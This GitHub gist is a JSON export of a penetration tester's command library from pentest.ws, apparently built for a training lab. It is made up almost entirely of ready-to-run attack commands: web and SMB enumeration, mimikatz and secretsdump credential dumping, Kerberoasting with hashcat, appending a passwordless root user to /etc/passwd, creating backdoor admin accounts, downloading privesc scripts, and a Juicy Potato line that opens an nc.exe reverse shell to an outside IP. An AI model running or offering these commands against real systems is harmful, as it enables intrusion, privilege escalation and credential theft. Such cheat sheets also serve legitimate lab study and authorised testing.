Skip to content

Instantly share code, notes, and snippets.

@ssstonebraker

ssstonebraker/pentestws.json

Created January 28, 2021 23:15
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ssstonebraker/5e8e55dd031f39e0a72eae3ca77f1e1f to your computer and use it in GitHub Desktop.
Save ssstonebraker/5e8e55dd031f39e0a72eae3ca77f1e1f to your computer and use it in GitHub Desktop.
Download ZIP
pentest.ws export
Raw
pentestws.json
{
"username": "brakertech",
"export_time": "2021-01-28T23:14:25.004Z",
"export_type": "Account Items",
"service_command_library": [
{
"service": "http",
"sort_order": null,
"name": "davtest",
"command": "davtest -url http://$ip:$port",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "dotdotpwn",
"command": "dotdotpwn -m http-url -u http://$ip:$port/TRAVERSAL -k \"root:\"",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "cewl",
"command": "cewl -d 10 -w log.cewl http://$ip",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "dirb",
"command": "dirb http://$ip -r -o log.80.dirb",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "dirsearch",
"command": "dirsearch -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 50 -e \",html,php,txt -f --plain-text-report=log.$port.dirsearch -u http://$ip:$port",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "nikto",
"command": "nikto -host $ip -port $port | tee log.$port.nikto",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "fuff - robotsdissalowed",
"command": "ffuf -c -w /usr/share/wordlists/RobotsDisallowed/top10000.txt -u http://$ip/FUZZ",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "OpenDoor ",
"command": "cd /opendoor && opendoor --host http://$ip -p $port --scan=directories -t 50 --reports json,html,txt --reports-dir=/root/labs/boxes/$ip/web_$port",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "ffuf - Biglist - FUZZ",
"command": "ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://$ip/FUZZ",
"notes": ""
},
{
"service": "imap",
"sort_order": null,
"name": "rdpscan - bluekeep check",
"command": "rdpscan $ip",
"notes": ""
},
{
"service": "ldap",
"sort_order": null,
"name": "ldap enum",
"command": "ldapsearch -x -h $ip -D 'svcorp\\alice' -w 'ThisIsTheUsersPassword01' -b \"DC=svcorp,DC=com\" > ldap_enum.txt",
"notes": ""
},
{
"service": "mdns",
"sort_order": null,
"name": "mdns zeroconf",
"command": "sudo nmap --script=broadcast-dns-service-discovery -sU -p $port $ip",
"notes": ""
},
{
"service": "microsoft-ds",
"sort_order": 1,
"name": "mount smb location",
"command": "mount -v -t cifs //$ip/some_folder /mnt/$ip",
"notes": ""
},
{
"service": "microsoft-ds",
"sort_order": 2,
"name": "enumerate users",
"command": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference",
"notes": ""
},
{
"service": "microsoft-ds",
"sort_order": 3,
"name": "smbclient",
"command": "smbclient -N -L \\\\\\\\$ip",
"notes": ""
},
{
"service": "microsoft-ds",
"sort_order": 4,
"name": "smbmap",
"command": "smbmap -H $ip -R",
"notes": "recursive directory listing"
},
{
"service": "microsoft-ds",
"sort_order": 5,
"name": "nmap -p 135,139,445 --script smb*",
"command": "mkdir -p /boxes/$ip/$ip_scan 2>/dev/null; nmap -p 135,139,445 --script smb* --script-args=unsafe=1 $ip -oA /boxes/$ip/$ip_scan/$ip_smb_all",
"notes": ""
},
{
"service": "ms-wbt-server",
"sort_order": null,
"name": "rdpscan (BlueKeep)",
"command": "rdpscan $ip",
"notes": "Check for BlueKeep vulnerability"
},
{
"service": "netbios-ssn",
"sort_order": null,
"name": "ngrep Samba version",
"command": "ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'",
"notes": ""
},
{
"service": "netbios-ssn",
"sort_order": null,
"name": "Check samba version",
"command": "smbclient -L $ip -U \"\" -N",
"notes": "in another window run this:\r\nngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'"
},
{
"service": "status",
"sort_order": null,
"name": "rpcinfo",
"command": "rpcinfo $ip",
"notes": ""
}
],
"general_command_library": [
{
"os": "linux",
"category": "cracking",
"sub_category": "kerberos",
"name": "hashcat -kerberos",
"command": "hashcat -a 0 -m 13100 svcorp-kerb.txt pw1.txt",
"notes": ""
},
{
"os": "Linux",
"category": "disk permissions",
"sub_category": "secrets",
"name": "grep for files in /dev",
"command": "grep -R --binary-files=text -B 2 '99999:7' /dev 2>/dev/null",
"notes": ""
},
{
"os": "Linux",
"category": "disk permissions",
"sub_category": "secrets",
"name": "Grep for files on disk",
"command": "grep -R --binary-files=text -B 2 '99999:7' /dev 2>/dev/null",
"notes": ""
},
{
"os": "Linux",
"category": "Enumeration",
"sub_category": "smb",
"name": "cme - shares",
"command": "python3 /usr/local/bin/cme smb 10.11.1.20 -u alice -p 'ThisIsTheUsersPassword01' –shares",
"notes": "crackmapexec"
},
{
"os": "Linux",
"category": "Hashdump",
"sub_category": "Windows",
"name": "cme - mimikatz",
"command": "sudo python3 /usr/local/bin/cme smb 10.11.1.22 -u alice -p 'ThisIsTheUsersPassword01' -M mimikatz",
"notes": ""
},
{
"os": "Linux",
"category": "Hashdump",
"sub_category": "Windows",
"name": "secretsdump",
"command": "/usr/bin/impacket-secretsdump kali:kalikali@10.11.1.13",
"notes": "If you get an error \"RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied\" then run this as admin:\nreg add HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM /V LocalAccountTokenFilterPolicy /t REG_DWORD /d 1"
},
{
"os": "Linux",
"category": "privesc",
"sub_category": "script",
"name": "/etc/passwd - Add root user",
"command": "echo newroot::0:0:root:/root:/bin/bash >> /etc/passwd",
"notes": ""
},
{
"os": "Linux",
"category": "privesc",
"sub_category": "Tools",
"name": "Download Privesc Tools",
"command": "IP=192.168.119.152;curl -O http://$IP/linuxprivchecker.py;curl -O http://$IP/lse.sh;curl -O http://$IP/linpeas.sh;curl -O http://$IP/linenum.sh;curl -O http://$IP/kernelpop.tar.gz;",
"notes": ""
},
{
"os": "Linux",
"category": "privesc",
"sub_category": "Tools",
"name": "linenum",
"command": "chmod +x linenum.sh; mkdir output-linenum; ./linenum.sh -r report -e ./output-linenum -t & 2>/dev/null",
"notes": ""
},
{
"os": "Windows",
"category": "default",
"sub_category": "directory",
"name": "dir",
"command": "dir /b /s /a-d ",
"notes": "show all files"
},
{
"os": "Windows",
"category": "disk permissions",
"sub_category": "Tools",
"name": "accesschk64.exe",
"command": "accesschk64.exe /accepteula -uws \"Everyone\" \"C:\\Program Files\"",
"notes": "ACL permissions"
},
{
"os": "Windows",
"category": "Hashdump",
"sub_category": "Tools",
"name": "GetUserSPNs",
"command": "python3 /pentest/exploitation/impacket/examples/GetUserSPNs.py -request -dc-ip 10.11.1.20 svcorp.com/evan",
"notes": ""
},
{
"os": "Windows",
"category": "post-exploitation",
"sub_category": "meterpreter",
"name": "Meterpreter File Search",
"command": "#Meterpreter\nsearch -f *.txt\nsearch -f *.zip\nsearch -f *.doc\nsearch -f *.xls\nsearch -f config*\nsearch -f *.rar\nsearch -f *.docx\nsearch -f *.sql\n",
"notes": ""
},
{
"os": "Windows",
"category": "privesc",
"sub_category": "Tools",
"name": "Juicy.Potato.x86.exe",
"command": "Juicy.Potato.x86.exe -l 1337 -p c:\\windows\\system32\\cmd.exe -a \"/c c:\\inetpub\\wwwroot\\nc.exe -e cmd.exe 192.168.119.152 4443\" -t * -c \"{659cdea7-489e-11d9-a9cd-000d56965251}\"",
"notes": "c:\\inetpub\\wwwroot>whoami /priv\nwhoami /priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name Description State\n============================= ========================================= ========\nSeAssignPrimaryTokenPrivilege Replace a process level token Disabled\nSeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled\nSeAuditPrivilege Generate security audits Disabled\nSeChangeNotifyPrivilege Bypass traverse checking Enabled\nSeImpersonatePrivilege Impersonate a client after authentication Enabled\nSeCreateGlobalPrivilege Create global objects Enabled\nSeIncreaseWorkingSetPrivilege Increase a process working set Disabled\n"
},
{
"os": "Windows",
"category": "privesc",
"sub_category": "Tools",
"name": "PowerUp",
"command": "powershell.exe -exec bypass -Command \"& {Import-Module .\\PowerUp.ps1; Invoke-AllChecks}\"\npowershell.exe -exec bypass\nImport-Module .\\PowerUp.ps1\nImport-Module .\\Privesc.psd1\nInvoke-AllChecks",
"notes": "cheat sheet\nhttps://h4ck.co/wp-content/uploads/2017/11/PowerUp.pdf"
},
{
"os": "Windows",
"category": "privesc",
"sub_category": "Tools",
"name": "windows-privesc-check2",
"command": "windows-privesc-check2.exe --audit -a -o report-disco",
"notes": "auditing, full python shell"
},
{
"os": "Windows",
"category": "privesc",
"sub_category": "Tools",
"name": "winpeas.exe",
"command": "winPEAS32.exe cmd searchall searchfast",
"notes": "REG ADD HKCU\\Console /v VirtualTerminalLevel /t REG_DWORD /d 1"
},
{
"os": "Windows",
"category": "users",
"sub_category": "native_commands",
"name": "Add group",
"command": "net localgroup administrators kali /add",
"notes": ""
},
{
"os": "Windows",
"category": "users",
"sub_category": "native_commands",
"name": "Add User",
"command": "net user kali kalikali /add",
"notes": ""
}
],
"default_service_checklist": null
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment